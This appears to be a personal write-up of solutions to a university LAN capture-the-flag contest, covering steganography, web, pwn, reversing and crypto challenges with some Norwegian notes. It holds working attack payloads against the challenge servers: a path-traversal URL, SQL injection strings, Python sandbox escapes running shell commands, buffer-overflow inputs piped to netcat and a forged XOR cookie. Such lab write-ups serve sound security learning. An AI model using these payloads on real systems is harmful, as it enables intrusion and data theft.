# IFI-LAN CTF :) Flag: `UiO-CTF{h4$h_cOOk13s_4re_m7_f4VoR1t3}` ## Misc ### Hawkeye “Come Amara, play with me. Let's finish our game of hide and seek…” “Don't hide yourself from the world and don't let the world hide himself from you!” * https://ctf.uioctf.no/files/2cd9655aa805f7835634007c07de56d4/WSG.jpg ``` $ steghide extract -sf WSG.jpg -p watchcom -xf output.txt the file "output.txt" does already exist. overwrite ? (y/n) y wrote extracted data to "output.txt". oklien@oklien-thinkpad:~/Documents/ctf/ifi$ oklien@oklien-thinkpad:~/Documents/ctf/ifi$ cat output.txt �PNG  IHDR
E^�kI
sRGB���gAMA�� �a pHYs��
�o�dtEXtSoftwareGreenshot^�IDATx^�XAv�0 �h'��&��颛.X�a�{d[�$c§�M5ϯ/G��4 ���@ ����� ����@`?�������v8|���o�c������v<?���-˧�x^d|���`��8|=�{��\9N��p����c9�)�9�$���P*�2���()��⁲�����O�l��J]��򚢶��>y-�����)Z���h�K��cRH�a�r�/���#��s�il��P=E^ϊx0���j5n�� H� ���
3��U� ��J~��uۚ ��=6��9�?��Y��'����D[����.-���0���g*9l������V �8p��
?ˡd�<@y](
Q�1���ǜ�Q3Bc��\�R��ȫ�A���\m���=�n(Q:]QS����&J~��r���������w;�
f*F
�F�u��B^W���[X���h~���a ��lu� [������]�����-�~fh��YL���ٙ�V�
%�scU�̼�Td����~�Z�\�F:0�NE���>�g��#y�������z�;�Z��Z����|�M׫���~:@d�~�
γ�
.�<"��X�~b��̅S�0�9^�9ں�s>OZ�{
�Ѻ\!�t�,��7c������+��N�y�9C��$��g��L>1�����V���Ϲ�hz~F׋��0�Z���� <?�G� i+W�^���% ��J��?��p���a�'�x]��[)�}o�jd��m������q����ׂk�I?{��_�ygNOB��^z~�sHy#;�Sv.�*VG�+<?��|Τ<RR��G����!�>�2?�����@,ES�Cz1&P2�:�s]�Hu�uhl���B9��e�<倢��n�R*S������a�6��;ӺS!K-�����H�x#ʐ�됗��rꎦj���9�~�#E����Q���<�]������䥺`apY(*qe8�g]��c�?������|{��8f�"W�E����u%VrTR���}���-‚ޚ����h���*�0 �ф_;�:���w��3�����?��nOs �sa��q�g�|��Z?���oy=Y8ߙk��1y2��K4��-�� ޮ/{��ρ��F�9��ρ�~~������PY6�IEND�B`�oklien@oklien-thinkpad:~/Documents/ctf/ifi$ mv output.txt output.png oklien@oklien-thinkpad:~/Documents/ctf/ifi$ file output.png output.png: PNG image data, 325 x 21, 8-bit/color RGB, non-interlaced ``` Flag: `UiO-CTF{i_donT_alwa7s_h1de_but_wh3n_i_d0_i_st3ghide}` ### Burglar easy Author: PewZ Find every file with size 1337, sort the filenames alphabetically and put together the first character from each file (contents) to form the flag. There will be a couple of files with 1337 bytes that aren't correct. `ssh -p 9999 ctf@burglar.uioctf.no The password is ctf.` find / -size 1337c ligger på /opt/uio/ og /etc/uio for i in $(ls -1 | sort -f); do head -c1 $i; done UiO-CTF{shwoo_fft_ah_tetmrnilaw_zirard}y 0_ctf.txt 1_ctf.txt 2_ctf.txt 3_ctf.txt 4_ctf.txt 5_ctf.txt 6_ctf.txt 7_ctf.txt 8_ctf.txt 9_ctf.txt A_ctf.txt a_ctf.txt B_ctf.txt b_ctf.txt C_ctf.txt c_ctf.txt D_ctf.txt d_ctf.txt E_ctf.txt e_ctf.txt F_ctf.txt f_ctf.txt G_ctf.txt g_ctf.txt H_ctf.txt h_ctf.txt I_ctf.txt i_ctf.txt J_ctf.txt j_ctf.txt K_ctf.txt k_ctf.txt L_ctf.txt l_ctf.txt M_ctf.txt m_ctf.txt N_ctf.txt n_ctf.txt O_ctf.txt o_ctf.txt små bokstav før stor, bare stokke om Flag: `UiO-CTF{show_off_that_terminal_wizardry}` ### Dana Bakeri 4 Life easy Author: Deadwolf How does Dana bakery make such great food? We found this meme, which may reveal their secrets 🤔 Photo: MysticSheik * https://ctf.uioctf.no/files/1bb12acfd1ca8255f262079303d1e6ac/varme_litt.png ``` $ zsteg -a varme_litt.png imagedata .. text: "\n\n\n###&&&" b1,rgb,msb,xy .. text: "$Ib;$Gn#" b2,b,msb,xy .. text: "er8UUU,8" b3,rgb,lsb,xy .. text: "G&${P:s9" b4,r,lsb,xy .. text: "vgxDUVfUfw" b4,g,lsb,xy .. text: "WDDDDeT3\"fT2" b4,b,lsb,xy .. text: "%yDC2\"Ex" b4,b,msb,xy .. text: "Us@wwwwL" b5,bgr,lsb,xy .. file: PGP\011Secret Key - b6,b,msb,xy .. text: "][WeU7M]UM7L]" b6,bgr,msb,xy .. text: "6]Z5~Y3e]V" b8,r,lsb,xy .. text: "!UiO-CTF{Club_Mate_+_Varme_Litt?}\n989;<=86778:;<??@@@?><;:865678;:99;<>@;;;99999>==<;:99==<;:9875689;:::99977777;:8778:;<<<<:753?><;:;=<9987664488888888=>><98:<9;=?A@@?A=955320/220-(&'\"$&(-024555443335689:9766677798899:;<<==<<:986537547:<;899::;<<<?=:878:<" ... ``` Flag: `UiO-CTF{Club_Mate_+_Varme_Litt?}` ## Web ### taco3 https://localtaco3.uioctf.no/?taco=../../../../../../../dev/fd/../environ dev/fd er symlink til proc/self/fd file descriptor Flag: `UiO-CTF{reading_the_environment_like_a_pro!!!}` ### You shall OR pass Author: marksome & Inj3ctor G4dget You might need an 💉 to get past this login form. * https://youshallorpass.uioctf.no med: ' OR 1=1 ``` SQL Error: Syntax error in SELECT id FROM users WHERE name=''' OR 1=1' and HASH('' OR 1=1', 'sha1') = passwd ``` Riktig sql injection blir da: ` ') or 1--` Flag: `UiO-CTF{G0_G4dget_G0}` ## PWN ### Calculator I bet you can't hack my calculator! ``` nc ctf.uioctf.no 1337 ----------------- Available commands: - calc: calculator - quit: quit >calc Input math (or 'q' to exit to menu): >e name 'e' is not defined >import sys invalid syntax (<string>, line 1) Input math (or 'q' to exit to menu): >__import__('os') <module 'os' from '/usr/lib/python2.7/os.pyc'> Input math (or 'q' to exit to menu): >os.system('ls') flag.txt server.py 0 Input math (or 'q' to exit to menu): >os.system('cat flag.txt') UiO-CTF{My_Calculator_Is_Not_Secure??}0 Input math (or 'q' to exit to menu): >/opt/wrap.sh: line 2: 274 Alarm clock python2 ./server.py ``` Flag: `UiO-CTF{My_Calculator_Is_Not_Secure??}` ### Overflow 1 easy Author: maritio_o Only the best type of LANers gets the special token of appreciation. Can you prove your one of the awesomest LANers? Here, take the binary file and the source code below for local pwning. To do remote pwning and get the real flag, connect to the remote server: nc overflow1.uioctf.no 6000 ``` $ python -c 'print "A" * 32 + "\x01\x00\x00\x00"' | nc overflow1.uioctf.no 6000 Welcome to the awesomest LAN party! What is your name? I will help you get registered. >Participant registered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Type: 1 Oh I didn't know. You are one of them.. The awesomest LAN participants... Here, take this! > UiO-CTF{CTFers_are_the_most_awesome_LANers} ``` Flag:`UiO-CTF{CTFers_are_the_most_awesome_LANers}` ### Secure Calculator This time I've secured my calculator with super strong hacker protection. ``` nc ctf.uioctf.no 1338 ----------------- Available commands: - play (0): start math quiz - calc (1): calculator [authorized members only!] - quit (2): quit >1 Not authorized to use calculator :/ ----------------- Available commands: - play (0): start math quiz - calc (1): calculator [authorized members only!] - quit (2): quit >0 What is 50 + 70? >120 What is 57 + 62? > ``` ``` import time from pwn import * #context.log_level = 'debug' c = remote('ctf.uioctf.no', 1338) c.recvuntil('>') c.send('0\n') while True: #time.sleep(0.1) question = c.recvline() print question if "authorized" in question: c.interactive() num1=question.split(' ')[2] num2=question.split(' ')[4].replace('?', '') num2=num2[:-1] answer=int(num1)+int(num2) print answer c.send(str(answer)+"\n") c.recvuntil('>') #else: # c.recvline() c.close() ``` ``` >$ ().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read() ``` Flag: `UiO-CTF{Quick_Maths_For_Quick_Hackers!}` ### Pwnylicious Author: maritio_o (Sopra Steria) Hey yall! This binary is so pwnylicious. Take the binary for local pwning, and source code for reversing. Check out the binary file and the source code below! To do remote pwning and get the real flag, connect to the remote server: `nc pwnylicious.uioctf.no 6004` ``` $ readelf -a pwnylicious | grep pwn 40: 00000000 0 FILE LOCAL DEFAULT ABS pwnylicious.c 54: 08048556 43 FUNC GLOBAL DEFAULT 14 be_pwnylicious ``` 08048556 ``` python -c 'print "A" * 32 + "\x56\x85\x04\x08"' | nc pwnylicious.uioctf.no 6004 Did you know Sopra Steria just opened their SOC? Do you know who their first customer is? >WRONG! You died. UiO-CTF{Sopra_Steria_also_knows_how_to_pwn:))))} /opt/wrap.sh: line 2: 217 Segmentation fault (core dumped) ./pwnylicious ``` Flag: `UiO-CTF{Sopra_Steria_also_knows_how_to_pwn:))))}` ### Overflow 2 easy Author: maritio_o This one requires even more control over how the stack works! Take the binary file and the source code below for local pwning. To do remote pwning and get the real flag, connect to the remote server: nc overflow2.uioctf.no 6001 ```c #define GAMER 0 #define CTFER 1 struct participant { char answer[48]; short userid; char gender; int8_t type; int birth_year; long long birth_date; float weight; uint32_t phone_number; }; int security_check(struct participant participant) { if (participant.userid != 1337) { return 0; } if (participant.gender != 'F') { return 0; } if (participant.type != CTFER) { return 0; } if (participant.birth_year != 1337) { return 0; } if (participant.birth_date != 13371337) { return 0; } if (participant.weight != 13.37f) { return 0; } if (participant.phone_number != 98761234) { return 0; } return 1; } ``` ``` $ python -c 'print "A" * 48 + "\x39\x05" + "\x46" + "\x01" + "\x39\x05\x00\x00" + "\xc9\x07\xcc\x00\x00\x00\x00\x00" + "\x85\xeb\x55\x41" + "\x12\xfa\xe2\x05"' | nc overflow2.uioctf.no 6001 __________ | __ __ | | | || | | | | || | | | |__||__| | | __ __()| | | || | | | | || | | | | || | | | | || | | | |__||__| | __________ |__________| _________ Want to enter this cool door? >Participant: User ID: 1337 Gender: 70 Type: 1 Birth year: 1337 Birth date: 13371337 Weight: 13.370000 Phone number: 98761234 COOL. Security check done. You may enter. And don't forget to take this flag!> UiO-CTF{pwn_is_super_fun_when_understanding_the_stack!!} ``` Flag: `UiO-CTF{pwn_is_super_fun_when_understanding_the_stack!!}` --- ## Revering ### Pinned Pizza Author: Dulte They are tired of us stealing their pizza, so they have hidden it inside a safe with a PIN. We have got hold of the program. Can you find the PIN. With the PIN you can get the flag from here nc pizzapin.uioctf.no 5001 * https://ctf.uioctf.no/files/f45aefff6da6d9dc430af6c68312767f/pizzapin reverse binær, get_pin() funksjonen ```c #include <stdio.h> int get_pin() { int var_8 = 0x4; for (int var_4 = 0x32; var_4 <= 0x34; var_4 = var_4 + 0x1) { var_8 = var_8 + var_4; } int rax = (var_8 - 0xa << 0x2) + (var_8 - 0xa) + (var_8 - 0xa << 0x2) + (var_8 - 0xa); return rax; } int main() { printf("PIN %d\n" , get_pin()); } ``` Kjørte, fikk: 1470 ``` $ nc pizzapin.uioctf.no 5001 Enter Pin to Get Pizza! 1470 You Found The Pizza! UiO-CTF{no_pin_can_stop_me} ``` Flag: `UiO-CTF{no_pin_can_stop_me}` ### The Key to Everlasting Pizza Author: Dulte The pizza shop has found a more sofisticated way of hiding the pizza. The now have a way to generating different passwords that gives you pizza. Can you crack the code and generate the passwords? nc pizzakey.uioctf.no 5000 * https://ctf.uioctf.no/files/6a257a403a887e4cfecca62ed0eb4fc2/pizzakey ### Rusty https://ctf.uioctf.no/files/0a45908b7aa1ff19590f054414d7738f/sikkerhet.tar.bz2 ## Web ### Military Grate Encryption API URL: https://military.uioctf.no/ API Swagger: https://military.uioctf.no/api/ #### Typescript given: ```ts import { Controller, Get, Req, Res, HttpStatus } from '@nestjs/common'; import { Request, Response } from 'express'; import { ApiUseTags } from '@nestjs/swagger'; import { Secret, Flag } from '../constants/secrets'; @ApiUseTags('flag') @Controller('flag') export class FlagController { @Get('cookie') getToken() { return 'cCwKBi1VJBY5Jh8FV1AJWH1KVnpdR2Njd0ZbdgFE'; } @Get('info') getInfo(@Req() req: Request, @Res() res: Response) { let b64cookie = new Buffer(req.headers.cookie, 'base64'); /* Decode base64 */ let cookie = b64cookie.toString(); if (!cookie || cookie.length < 30) { res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized'); return; } /* Decrypting our military grade encryption */ let decryptedCookie = this.decrypt(cookie, 30); console.log('Decrypted info cookie: ', decryptedCookie); if (decryptedCookie.includes('Scope=') && decryptedCookie.includes('read:info')){ res.status(HttpStatus.OK).send('This is some cool info.'); return; } res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized'); } @Get('flag') getFlag(@Req() req: Request, @Res() res: Response) { let b64cookie = new Buffer(req.headers.cookie, 'base64'); /* Decode base64 */ let cookie = b64cookie.toString(); if (!cookie || cookie.length < 30) { res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized'); return; } /* Decrypting our military grade encryption */ let decryptedCookie = this.decrypt(cookie, 30); console.log('Decrypted flag cookie: ', decryptedCookie); if (decryptedCookie.includes('Scope=') && decryptedCookie.includes('read:flag')){ res.status(HttpStatus.OK).send(Flag); return; } res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized'); } decrypt = function(cookie: string, length: number): string { /* Strings in Javascript are immutable. * Convert string to array for XOR encryption */ let cookieArray: string[] = cookie.split(""); for(let i = 0; i < length; i++) { /* XOR operation (^) requires integer */ let xor = Secret.charCodeAt(i) ^ cookie.charCodeAt(i); cookieArray[i] = String.fromCharCode(xor); } return cookieArray.join(''); }; } ``` #### Solution Python script for deriving the key via known plaintext attack. Known plaintext: `Scope= read:flag` ```python from base64 import b64decode, b64encode plain_info = "Scope= read:info" # 30 bytes string plain_flag = "Scope= read:flag" # 30 bytes string cookie = b64decode("cCwKBi1VJBY5Jh8FV1AJWH1KVnpdR2Njd0ZbdgFE").decode() # derive key for /flag/info key_list = [] for i in range(len(plain_info)): b = ord(plain_info[i]) ^ ord(cookie[i]) key_list.append(b) key_bytes = "".join(map(chr, key_list)) key_base64 = b64encode(key_bytes.encode()) print("Cookie (info): '{}'".format(key_base64.decode())) # key verification for info plain_list = [] for i in range(len(key_bytes)): b = ord(key_bytes[i]) ^ ord(cookie[i]) plain_list.append(b) print("Verified plaintext (info): '{}'".format("".join(map(chr, plain_list)))) # derive key for /flag/flag key_list = [] for i in range(len(plain_flag)): b = ord(plain_flag[i]) ^ ord(cookie[i]) key_list.append(b) key_bytes = "".join(map(chr, key_list)) key_base64 = b64encode(key_bytes.encode()) print("Cookie (flag): '{}'".format(key_base64.decode())) # key verification for flag plain_list = [] for i in range(len(key_bytes)): b = ord(key_bytes[i]) ^ ord(cookie[i]) plain_list.append(b) print("Verified plaintext (flag): '{}'".format("".join(map(chr, plain_list)))) ``` ##### Output from script ``` Cookie (info): 'I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3wyGGcr' Verified plaintext (info): 'Scope= read:info' Cookie (flag): 'I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3w9GmAj' Verified plaintext (flag): 'Scope= read:flag' ``` ##### Get the flag ``` $ curl -X GET https://military.uioctf.no/flag/flag -H "accept: application/json" --cookie "base64=I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3w9GmAj" $ curl -X GET https://military.uioctf.no/flag/info -H "accept: application/json" --cookie "base64=I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3wyGGcr" ``` ## Crypto ### Weapons of Mass Encryption easy challenging Author: cyanboy Decrypt all the nuclear launch codes! `nc ancient.uioctf.no 6969` etter manuell testing, rot22. må automatisere. ``` import time from pwn import * alph="abcdefghijklmnopqrstuvwxyz" rot13_table = dict(zip(alph, alph[22:]+alph[:22])) # lowercase character mappings rot13_table.update((c.upper(),rot13_table[c].upper()) for c in alph) # upppercase def rot13(s): return "".join(rot13_table.get(c, c) for c in s) context.log_level = 'debug' c = remote('ancient.uioctf.no', 6969) c.recvuntil('START DECRYPTION') while True: #time.sleep(0.1) line = c.recvuntil('->') print line rot22 = line.split(': ')[1].replace(' ->', '') print rot22 print rot13(rot22) c.send(rot13(rot22) + '\n') c.close() ``` etter en del kjøring: ``` [0x7f]: wempjmwl lsvwi kecep gexxpi -> wempjmwl lsvwi kecep gexxpi sailfish horse gayal cattle [DEBUG] Sent 0x1c bytes: 'sailfish horse gayal cattle\n' [DEBUG] Received 0x36 bytes: 'DECRYPTION SUCCESSFUL\n' 'UiO-CTF{hail_to_the_caesar_bby}\n' ``` Flag: `UiO-CTF{hail_to_the_caesar_bby}`